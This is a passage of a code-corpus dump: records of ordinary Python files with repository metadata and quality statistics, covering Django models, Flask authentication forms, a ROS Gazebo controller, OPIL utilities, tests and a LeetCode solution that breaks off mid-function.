return mac_address_list | 45.806452 | 167 | 0.625352 | 164 | 1,420 | 5.030488 | 0.323171 | 0.254545 | 0.118788 | 0.10303 | 0.541818 | 0.473939 | 0.242424 | 0.242424 | 0 | 0 | 0 | 0.057307 | 0.262676 | 1,420 | 31 | 168 | 45.806452 | 0.730659 | 0 | 0 | 0 | 0 | 0 | 0.137421 | 0.097956 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.37037 | 0.037037 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25b1a19eb6d8e239df7d680bb083dcaf01ffaddb | 2,864 | py | Python | apps/exporter/models.py | mjj55409/cpq-exporter | ae46c1580a1c7d228a352a88a61164d9b3c2490c | [
"MIT"
] | null | null | null | apps/exporter/models.py | mjj55409/cpq-exporter | ae46c1580a1c7d228a352a88a61164d9b3c2490c | [
"MIT"
] | null | null | null | apps/exporter/models.py | mjj55409/cpq-exporter | ae46c1580a1c7d228a352a88a61164d9b3c2490c | [
"MIT"
] | null | null | null | from django.conf import settings
from django.db import models
# from django.template.defaultfilters import slugify
from django.utils.translation import ugettext_lazy as _
class KB (models.Model):
name = models.CharField(max_length=30, unique=True)
repository_url = models.CharField(max_length=100, blank=False)
def __str__(self):
return self.name
class Destination (models.Model):
TYPE_DB = 0
TYPE_ECC = 1
TYPE_CRM = 2
TYPE_CHOICES = (
(TYPE_DB, _('Database')),
(TYPE_ECC, _('ECC System')),
(TYPE_CRM, _('CRM System'))
)
name = models.CharField(max_length=30)
destination_type = models.SmallIntegerField(choices=TYPE_CHOICES, default=0)
client = models.CharField(max_length=3, default='000', blank=False)
def __str__(self):
return self.name
class DatabaseDestination (models.Model):
TYPE_MSSQL = 0
TYPE_MYSQL = 1
TYPE_JDBC = 2
TYPE_CHOICES = (
(TYPE_MSSQL, _('Microsoft SQL')),
(TYPE_MYSQL, _('MYSQL')),
(TYPE_JDBC, _('Java Connector'))
)
destination = models.OneToOneField(Destination, on_delete=models.CASCADE, primary_key=True)
database_type = models.SmallIntegerField(choices=TYPE_CHOICES, default=0)
host = models.CharField(max_length=100, blank=True)
port = models.CharField(max_length=7, blank=True)
database_name = models.CharField(max_length=100, blank=False)
def __str__(self):
return self.database_name + '@' + self.host + ':' + self.port
class SAPDestination (models.Model):
destination = models.OneToOneField(Destination, on_delete=models.CASCADE, primary_key=True)
host = models.CharField(max_length=100, blank=False)
sid = models.CharField(max_length=4, blank=False)
class Project (models.Model):
name = models.CharField(max_length=40, unique=True)
description = models.TextField(blank=True)
def __str__(self):
return self.name
class ProjectStep (models.Model):
project = models.ForeignKey(Project, on_delete=models.CASCADE, related_name='steps')
step_number = models.PositiveSmallIntegerField(null=False, default=1)
name = models.CharField(max_length=40, blank=True)
kb = models.ForeignKey(KB)
def __str__(self):
return self.project.name + '.' + self.kb.name
class Execution (models.Model):
project = models.ForeignKey(Project)
time_start = models.DateTimeField(null=True, blank=True)
time_end = models.DateTimeField(null=True, blank=True)
duration = models.DurationField(blank=True, null=True)
export_status = models.BooleanField(blank=True)
class ExecutionStep (models.Model):
execution = models.ForeignKey(Execution)
step = models.ForeignKey(ProjectStep)
time_start = models.DateTimeField()
time_end = models.DateTimeField()
status = models.BooleanField()
| 30.795699 | 95 | 0.706355 | 349 | 2,864 | 5.590258 | 0.26361 | 0.084572 | 0.101486 | 0.135315 | 0.433624 | 0.421322 | 0.309585 | 0.215274 | 0.160943 | 0.13634 | 0 | 0.014906 | 0.180168 | 2,864 | 92 | 96 | 31.130435 | 0.816014 | 0.017458 | 0 | 0.181818 | 0 | 0 | 0.025249 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075758 | false | 0 | 0.045455 | 0.075758 | 0.878788 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
25b3918a371821cdc9c995f47c968bb1c9ab06ab | 6,312 | py | Python | src/forms.py | Afsharov/observer-frontend | bd93fd1d7fa1a63ca650640995e1f10b0c99df44 | [
"BSD-3-Clause"
] | null | null | null | src/forms.py | Afsharov/observer-frontend | bd93fd1d7fa1a63ca650640995e1f10b0c99df44 | [
"BSD-3-Clause"
] | null | null | null | src/forms.py | Afsharov/observer-frontend | bd93fd1d7fa1a63ca650640995e1f10b0c99df44 | [
"BSD-3-Clause"
] | 1 | 2021-04-23T08:25:55.000Z | 2021-04-23T08:25:55.000Z | """This module contains all forms used by the Observer-Hive frontend.
"""
import os
import json
import logging
from bcrypt import checkpw
from flask_wtf import FlaskForm
from flask_login import current_user
from wtforms import StringField, PasswordField
from wtforms.validators import InputRequired, EqualTo, Length
logger = logging.getLogger('src')
def get_users():
"""Retrieve all users and their passwords.
:return: dictionary with all users and passwords
"""
cwd = os.path.dirname(os.path.abspath(__file__))
with open(cwd + '/users.json') as registered_users:
users = json.load(registered_users)
return users
class LoginForm(FlaskForm):
"""This class defines the login form.
The form provides two entry fields for the user's
credentials: username and password.
"""
username = StringField('username',
validators=[InputRequired(
message="Please enter a Username.")])
password = PasswordField('password',
validators=[InputRequired(
message="Please enter your Password.")])
def __init__(self, *args, **kwargs):
FlaskForm.__init__(self, *args, **kwargs)
def validate(self):
"""Custom validator for the login form.
Checks if username is known to the app and compares the
entered password to the stored one.
:return: True if all checks have been passed
"""
rv = FlaskForm.validate(self)
if not rv:
return False
users = get_users()
username = self.username.data
if username not in users:
self.username.errors.append('Unknown username')
logger.info(username + ' unknown.')
return False
if not checkpw(self.password.data.encode('utf-8'),
users[username].encode('utf-8')):
self.password.errors.append('Invalid password')
logger.info('Denied access to '
+ username
+ ' due to wrong password.')
return False
return True
class ChangeCredentialsForm(FlaskForm):
"""This class defines the form to change an existing users password.
The form provides one entry fields for the current password and two
entry fields for new password, the second one being used for verification.
"""
username = StringField('username',
validators=[InputRequired(
message="Please enter a Username.")])
currentPassword = PasswordField('currentPassword',
validators=[
InputRequired(
message="Please enter your current Password.")])
newPassword1 = PasswordField('newPassword1',
validators=[
InputRequired(
message="Please enter your new Password."),
Length(min=4,
message="Your password must contain at least 4 characters.")])
newPassword2 = PasswordField('newPassword2',
validators=[
InputRequired(message=
"Please enter your new Password again."),
EqualTo('newPassword1',
message=
'Passwords must match')])
def __init__(self, *args, **kwargs):
FlaskForm.__init__(self, *args, **kwargs)
def validate(self):
"""Custom validator to change credentials.
Checks if user provided the correct password currently in use and
changes it if user has entered a new password which has been
verified by entering it a second time.
:return: True if all checks have been passed.
"""
rv = FlaskForm.validate(self)
if not rv:
return False
users = get_users()
if not checkpw(self.currentPassword.data.encode('utf-8'),
users[current_user.id].encode('utf-8')):
self.currentPassword.errors.append('Invalid password')
logger.info('Attempt to change password of '
+ current_user.id
+ ' failed due to wrong current password.')
return False
return True
class RegisterForm(FlaskForm):
"""This class defines part the registration form.
The form provides entry fields for the chosen username and
two entry fields for a password, the second one being used for verification.
"""
username = StringField('username',
validators=[InputRequired(
message="Please enter a Username.")])
password1 = PasswordField('password1',
validators=[
InputRequired(
message="Please enter your new Password."),
Length(min=4,
message="Your password must contain at least 4 characters.")])
password2 = PasswordField('password2',
validators=[
InputRequired(message=
"Please enter your new Password again."),
EqualTo('password1',
message=
'Passwords must match')])
def __init__(self, *args, **kwargs):
FlaskForm.__init__(self, *args, **kwargs)
def validate(self):
"""Custom validator for new user registrations.
Checks if password is at least 4 characters long and verifies the
correct entry by comparing it to the second input of password.
:return: True if all checks have been passed.
"""
rv = FlaskForm.validate(self)
if not rv:
return False
return True
| 35.460674 | 106 | 0.53628 | 596 | 6,312 | 5.615772 | 0.260067 | 0.061846 | 0.080669 | 0.096803 | 0.475949 | 0.435913 | 0.366597 | 0.366597 | 0.366597 | 0.366597 | 0 | 0.004938 | 0.390368 | 6,312 | 177 | 107 | 35.661017 | 0.864865 | 0.209918 | 0 | 0.574257 | 0 | 0 | 0.149812 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0.257426 | 0.079208 | 0 | 0.366337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
25beeed839f274d72d91b74c8a4940ac9efd14ae | 1,570 | py | Python | eddiebot_apps/eddiebot_ssl/scripts/model_controller.py | TooSchoolForCool/EddieBot-ROS | 5dad6d5a6eb974135b7c9587abc0ae17d1ec6760 | [
"Apache-2.0"
] | 5 | 2019-05-15T19:31:47.000Z | 2019-08-31T01:12:35.000Z | eddiebot_apps/eddiebot_ssl/scripts/model_controller.py | TooSchoolForCool/EddieBot-ROS | 5dad6d5a6eb974135b7c9587abc0ae17d1ec6760 | [
"Apache-2.0"
] | null | null | null | eddiebot_apps/eddiebot_ssl/scripts/model_controller.py | TooSchoolForCool/EddieBot-ROS | 5dad6d5a6eb974135b7c9587abc0ae17d1ec6760 | [
"Apache-2.0"
] | 4 | 2019-06-03T12:21:44.000Z | 2019-12-25T08:57:46.000Z | #!/usr/bin/env python
import rospy
import tf
from gazebo_msgs.srv import SetModelState, DeleteModel, SpawnModel
from gazebo_msgs.msg import ModelState
from geometry_msgs.msg import Pose, Point, Quaternion
class ModelController(object):
def __init__(self):
rospy.wait_for_service("gazebo/delete_model")
rospy.wait_for_service("gazebo/spawn_sdf_model")
rospy.wait_for_service("gazebo/set_model_state")
self.set_state_srv_ = rospy.ServiceProxy("/gazebo/set_model_state", SetModelState)
self.spawn_model_srv_ = rospy.ServiceProxy("/gazebo/spawn_sdf_model", SpawnModel)
self.delete_model_srv_ = rospy.ServiceProxy("/gazebo/delete_model", DeleteModel)
def goto(self, model, x, y, yaw):
quaternion = tf.transformations.quaternion_from_euler(0, 0, yaw)
pose = Pose()
pose.position.x = x
pose.position.y = y
pose.position.z = 0
pose.orientation.x = quaternion[0]
pose.orientation.y = quaternion[1]
pose.orientation.z = quaternion[2]
pose.orientation.w = quaternion[3]
state = ModelState()
state.model_name = model
state.pose = pose
try:
ret = self.set_state_srv_(state)
# print("[ModelController]: {}".format(ret.status_message))
except Exception, e:
rospy.logerr('Error on calling service: %s',str(e))
def spawn_model(self, model_name, model_sdf, x, y, z):
pose = Pose()
pose.position.x = x
pose.position.y = y
pose.position.z = z
pose.orientation.w = 1
self.spawn_model_srv_(model_name, model_sdf, "", pose, "world")
def delete_model(self, model_name):
self.delete_model_srv_(model_name) | 28.545455 | 84 | 0.738217 | 226 | 1,570 | 4.893805 | 0.29646 | 0.065099 | 0.03255 | 0.051537 | 0.221519 | 0.142857 | 0.088608 | 0.088608 | 0.088608 | 0.088608 | 0 | 0.005926 | 0.140127 | 1,570 | 55 | 85 | 28.545455 | 0.813333 | 0.049682 | 0 | 0.153846 | 0 | 0 | 0.108652 | 0.060362 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.128205 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25c80db82d1ebad170680349cd93672e15412051 | 1,342 | py | Python | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 162 | 2019-04-05T02:05:45.000Z | 2022-01-15T02:16:59.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 16 | 2019-05-11T15:38:25.000Z | 2020-08-12T13:15:45.000Z | code/src/main.py | ChaofWang/AWSRN | b7e285e73667e114ccb69e354254c4f67ca39e25 | [
"MIT"
] | 22 | 2019-04-20T14:37:51.000Z | 2022-03-21T05:58:17.000Z | import torch
import utility
import data
import model
import loss
from option import args
from trainer import Trainer
def print_network(net):
num_params = 0
for param in net.parameters():
num_params += param.numel()
print(net)
print('Total number of parameters: %d' % num_params)
def print_setting(net, args):
print('init this train:')
print_network(net)
print('training model:', args.model)
print('scale:', args.scale)
print('resume from ', args.resume)
print('output patch size', args.patch_size)
print('model setting: n_resblocks:', args.n_resblocks,
'n_feats:', args.n_feats, 'block_feats:', args.block_feats)
print('optimization setting: ', args.optimizer)
print('total epochs:', args.epochs)
print('lr:', args.lr, 'lr_decay at:', args.decay_type, 'decay gamma:', args.gamma)
print('train loss:', args.loss)
print('save_name:', args.save)
torch.manual_seed(args.seed)
checkpoint = utility.checkpoint(args)
if checkpoint.ok:
loader = data.Data(args)
model = model.Model(args, checkpoint)
print_setting(model, args)
loss = loss.Loss(args, checkpoint) if not args.test_only else None
t = Trainer(args, loader, model, loss, checkpoint)
while not t.terminate():
t.train()
t.test()
checkpoint.done()
| 27.958333 | 87 | 0.671386 | 183 | 1,342 | 4.819672 | 0.355191 | 0.030612 | 0.034014 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00093 | 0.198957 | 1,342 | 47 | 88 | 28.553191 | 0.819535 | 0 | 0 | 0 | 0 | 0 | 0.168531 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.179487 | 0 | 0.230769 | 0.435897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
25c81eb343b1d3a48857d65ac0f1c63ee02f3d87 | 710 | py | Python | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | mycroft/views.py | seakers/daphne-brain | 1d703d468cd503a21395f986dd72e67b6e556451 | [
"MIT"
] | null | null | null | from rest_framework.views import APIView
from rest_framework.response import Response
from auth_API.helpers import get_or_create_user_information
class CheckConnection(APIView):
def post(self, request, format=None):
# --> 1. Get connection status and id
user_info = get_or_create_user_information(request.session, request.user, 'EOSS')
conn_status = user_info.mycroft_connection
conn_id = user_info.mycroft_session
print('--> CHECKING MYCROFT CONNECTIONS:', conn_id, conn_status)
if conn_status is False:
return Response({"connection": "false", "access_token": conn_id})
else:
return Response({"connection": "true"})
| 29.583333 | 89 | 0.7 | 87 | 710 | 5.448276 | 0.505747 | 0.050633 | 0.07173 | 0.063291 | 0.109705 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001783 | 0.209859 | 710 | 23 | 90 | 30.869565 | 0.843137 | 0.049296 | 0 | 0 | 0 | 0 | 0.116418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.538462 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
25d2427f17acf99c0e015181ad76ec8cf75b6f09 | 1,065 | py | Python | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | src/bst/pygasus/datamanager/grokker.py | codeix/bst.pygasus.datamanager | 3b60cbc0b44814701fcbc8c5558a30002a9a2778 | [
"ZPL-2.1"
] | null | null | null | import martian
from martian.error import GrokError
from grokcore.component import name as namedirective
from zope import component
from bst.pygasus.datamanager.model import ExtBaseModel
from bst.pygasus.datamanager.interfaces import IModelTransformer
from bst.pygasus.datamanager.transformer import ModelTransfomerUtility
class schema(martian.Directive):
scope = martian.CLASS
store = martian.ONCE
default = None
class ExtModelGrokker(martian.ClassGrokker):
martian.component(ExtBaseModel)
martian.directive(schema)
martian.directive(namedirective)
def execute(self, class_, schema, name, **kw):
if schema is None:
raise GrokError('Class %s is missing directive "schema". Need a Interface\
to create the model.' % class_, class_)
if not name:
name = class_.__name__
gsm = component.getGlobalSiteManager()
transformer = ModelTransfomerUtility(class_, schema)
gsm.registerUtility(transformer, IModelTransformer, name)
return True
| 31.323529 | 86 | 0.721127 | 112 | 1,065 | 6.776786 | 0.455357 | 0.027668 | 0.055336 | 0.098814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212207 | 1,065 | 33 | 87 | 32.272727 | 0.904648 | 0 | 0 | 0 | 0 | 0 | 0.005634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.28 | 0 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
25d28a94c243549378bccac5503509c7d698f1cd | 4,833 | py | Python | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 3 | 2020-07-09T19:52:58.000Z | 2020-08-05T18:05:54.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | 293 | 2020-06-19T18:51:27.000Z | 2021-09-17T20:42:41.000Z | intent_parser/utils/opil_utils.py | SD2E/experimental-intent-parser | 65aee0ad800777f265210766a9e5eac431e0feaa | [
"BSD-3-Clause"
] | null | null | null | """
Provides a list of functions for building opil objects.
"""
from intent_parser.intent.measure_property_intent import MeasuredUnit
from intent_parser.intent_parser_exceptions import IntentParserException
import intent_parser.utils.sbol3_utils as sbol3_utils
import intent_parser.table.cell_parser as cell_parser
import intent_parser.constants.intent_parser_constants as ip_constants
import opil
import tyto
def create_opil_boolean_parameter_value(value: bool):
parameter_value = opil.BooleanValue()
parameter_value.value = value
return parameter_value
def create_opil_enumerated_parameter_value(value: str):
parameter_value = opil.EnumeratedValue()
parameter_value.value = value
return parameter_value
def create_opil_integer_parameter_value(value: int):
parameter_value = opil.IntegerValue()
parameter_value.value = value
return parameter_value
def create_opil_measurement_parameter_value(value: float, unit=''):
parameter_value = opil.MeasureValue()
measure = MeasuredUnit(value, unit)
parameter_value.has_measure = measure.to_opil_measure()
return parameter_value
def create_opil_string_parameter_value(value: str):
parameter_value = opil.StringValue()
parameter_value.value = value
return parameter_value
def create_opil_URI_parameter_value(value: str):
parameter_value = opil.URIValue()
parameter_value.value = value
return parameter_value
def create_parameter_value_from_parameter(opil_parameter, parameter_value):
if isinstance(opil_parameter, opil.BooleanParameter):
return create_opil_boolean_parameter_value(bool(parameter_value))
elif isinstance(opil_parameter, opil.EnumeratedParameter):
return create_opil_enumerated_parameter_value(str(parameter_value))
elif isinstance(opil_parameter, opil.IntegerParameter):
return create_opil_integer_parameter_value(int(parameter_value))
elif isinstance(opil_parameter, opil.MeasureParameter):
if cell_parser.PARSER.is_number(str(parameter_value)):
return create_opil_measurement_parameter_value(parameter_value, tyto.OM.number)
possible_units = list(ip_constants.FLUID_UNIT_MAP.keys()) + list(ip_constants.TIME_UNIT_MAP.keys())
measured_units = cell_parser.PARSER.process_values_unit(parameter_value,
units=possible_units,
unit_type='fluid')
if len(measured_units) != 1:
raise IntentParserException('Expecting one Measurement Parameter value but %d were found.' % len(measured_units))
return create_opil_measurement_parameter_value(float(measured_units[0].get_value()),
measured_units[0].get_unit())
elif isinstance(opil_parameter, opil.StringParameter):
return create_opil_string_parameter_value(str(parameter_value))
elif isinstance(opil_parameter, opil.URIParameter):
return create_opil_URI_parameter_value(str(parameter_value))
def get_param_value_as_string(parameter_value):
if type(parameter_value) is opil.BooleanValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.EnumeratedValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.IntegerValue:
return str(parameter_value.value)
elif type(parameter_value) is opil.MeasureValue:
if parameter_value.has_measure:
measure_number = float(parameter_value.has_measure.value)
measure_unit = sbol3_utils.get_unit_name_from_uri(parameter_value.has_measure.unit)
if measure_unit:
if measure_unit == tyto.OM.number:
return str(measure_number)
else:
return str(measure_number) + ' ' + measure_unit
return str(measure_number)
elif type(parameter_value) is opil.StringValue:
return parameter_value.value if parameter_value.value else ' '
elif type(parameter_value) is opil.URIValue:
return str(parameter_value.value)
elif isinstance(parameter_value, str):
return parameter_value
return ''
def fix_nonunique_parameter_names(doc):
# Collect all objects in Document
all_objects = doc.find_all(lambda obj: True if obj.name else False)
# Gather objects with non-unique names
name_map = {o.name: [] for o in all_objects if o.name}
for o in all_objects:
name_map[o.name].append(o)
# Rename using name + description + display_id
for name, nonuniquely_named_objects in name_map.items():
if len(nonuniquely_named_objects) > 1:
for o in nonuniquely_named_objects:
o.name = f'{o.name} ({o.description})({o.display_id})'
| 43.540541 | 125 | 0.723774 | 589 | 4,833 | 5.62309 | 0.193548 | 0.253623 | 0.097524 | 0.041667 | 0.428744 | 0.310386 | 0.249094 | 0.173007 | 0.173007 | 0.157005 | 0 | 0.001822 | 0.205256 | 4,833 | 110 | 126 | 43.936364 | 0.860453 | 0.035175 | 0 | 0.206897 | 0 | 0 | 0.023426 | 0.007092 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.08046 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25d56f5b093e66a6e34a5f01df8b3463c937cd78 | 1,537 | py | Python | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 63 | 2015-01-03T04:19:23.000Z | 2021-07-19T22:33:16.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 1 | 2015-09-14T08:55:40.000Z | 2018-01-23T08:56:47.000Z | Tools/fontcompile.py | aunicornfarmer/gotris | 6c125071d5add7fc71716ecbb08474c607561555 | [
"MIT"
] | 28 | 2015-02-23T10:31:05.000Z | 2021-06-18T12:33:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# compiled font is a binary blob:
# 1. magic (MFNT) - 4 bytes
# 2. number of symbols - 4 bytes
# 3. font y advance - 4 bytes
# 4. an array of glyphs (offset_x, offset_y, width, height, tx, ty, tx2, ty2, x_advance) - 36 * number of symbols
# (iiIIffffI)
# 5. png texture
import sys
import struct
import os
from xml2obj import xml2obj
def print_usage_and_exit():
print "usage: {0} <UNPACKED FONT>".format(sys.argv[0])
sys.exit(1)
if len(sys.argv) != 2:
print_usage_and_exit()
fontfile = sys.argv[1]
if not os.path.exists(fontfile):
print_usage_and_exit()
glyphs = []
with file(fontfile + ".fontdef.xml", 'r') as f:
xmlobj = xml2obj(f.read())
font_y_advance = int(xmlobj.height)
for g in xmlobj.glyph:
glyphs.append((unicode(g.symbol), int(g.offset_x), int(g.offset_y), int(g.width), int(g.height), float(g.tx), float(g.ty), float(g.tx2), float(g.ty2), int(g.x_advance)))
with file(fontfile[:-4] + ".font", 'w') as f:
f.write("MFNT")
f.write(struct.pack("<I", len(glyphs)))
f.write(struct.pack("<I", font_y_advance))
for g in glyphs:
f.write(struct.pack("<iiIIffffI", g[1], g[2], g[3], g[4], g[5], g[6], g[7], g[8], g[9]))
unicode_fontcp = []
for i, g in enumerate(glyphs):
unicode_fontcp.append((g[0], i+1))
def unicode_fontcp_key(item):
return item[0]
unicode_fontcp.sort(key=unicode_fontcp_key)
for entry in unicode_fontcp:
f.write(struct.pack("<II", ord(entry[0]), entry[1]))
with file(fontfile, 'r') as imgf:
imgdata = imgf.read()
f.write(imgdata)
| 25.616667 | 170 | 0.666233 | 273 | 1,537 | 3.652015 | 0.355311 | 0.036108 | 0.048144 | 0.064193 | 0.062187 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028963 | 0.146389 | 1,537 | 59 | 171 | 26.050847 | 0.730945 | 0.193234 | 0 | 0.057143 | 0 | 0 | 0.054427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.114286 | null | null | 0.114286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25db68b1e4b300ed7435559d769a87a914307b00 | 1,171 | py | Python | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 3 | 2020-12-27T21:52:52.000Z | 2021-08-23T10:26:10.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 12 | 2020-12-22T22:36:28.000Z | 2021-01-18T13:39:34.000Z | app/tests/support/test_views.py | Valaraucoo/raven | 0157e193baf569be9479a78838dc26d77a11a99d | [
"BSD-3-Clause"
] | 2 | 2020-12-27T21:52:39.000Z | 2021-11-18T08:08:25.000Z | import pytest
from django.urls import reverse
from tests.users import factories as users_factories
@pytest.mark.django_db
class TestTicketCreateView:
def test_get(self,client):
url = reverse('support:support-contact')
response = client.get(url)
assert response.status_code == 200
def test_post(self,client):
url = reverse('support:support-contact')
response = client.post(url)
assert response.status_code == 200
user = users_factories.StudentFactory()
data = {
"email": user.email,
"category": '1',
"fullname": f'{user.first_name} {user.last_name}',
"description": "problem"
}
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '2'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '3'
response = client.post(url, data=data)
assert response.status_code == 200
data['category'] = '0'
response = client.post(url, data=data)
assert response.status_code == 200
| 26.022222 | 62 | 0.608027 | 132 | 1,171 | 5.295455 | 0.333333 | 0.120172 | 0.171674 | 0.206009 | 0.615165 | 0.615165 | 0.529328 | 0.529328 | 0.529328 | 0.37196 | 0 | 0.026005 | 0.277541 | 1,171 | 44 | 63 | 26.613636 | 0.800236 | 0 | 0 | 0.387097 | 0 | 0 | 0.125534 | 0.039283 | 0 | 0 | 0 | 0 | 0.193548 | 1 | 0.064516 | false | 0 | 0.096774 | 0 | 0.193548 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
25dbcc8ad9f17eebc5ce137f97fcdf06a4148e19 | 1,827 | py | Python | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | 8 | 2019-03-18T06:37:24.000Z | 2022-01-30T07:50:58.000Z | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | lc0415_add_strings.py | bowen0701/python-algorithms-data-structures | e625f59a9fc59e4728825078d4434a7968a724e5 | [
"BSD-2-Clause"
] | null | null | null | """Leetcode 415. Add Strings
Easy
URL: https://leetcode.com/problems/add-strings/
Given two non-negative integers num1 and num2 represented as string,
return the sum of num1 and num2.
Note:
- The length of both num1 and num2 is < 5100.
- Both num1 and num2 contains only digits 0-9.
- Both num1 and num2 does not contain any leading zero.
- You must not use any built-in BigInteger library or convert the inputs to
integer directly.
"""
class SolutionPaddingAddBackwardIter(object):
def _padding(self, num1, num2):
n1, n2 = len(num1), len(num2)
if n1 < n2:
num1 = '0' * (n2 - n1) + num1
elif n1 > n2:
num2 = '0' * (n1 - n2) + num2
return num1, num2
def addStrings(self, num1, num2):
"""
:type num1: str
:type num2: str
:rtype: str
Time complexity: O(n).
Space complexity: O(1).
"""
from collections import deque
# Pad shorter num with leading zeros to string of equal length.
num1, num2 = self._padding(num1, num2)
# Start with carry 0, add digits of num1 & num2 from backward to array.
sum_arr = deque([])
i = len(num1) - 1
carry = 0
while i >= 0 or carry > 0:
if i >= 0:
val = int(num1[i]) + int(num2[i]) + carry
else:
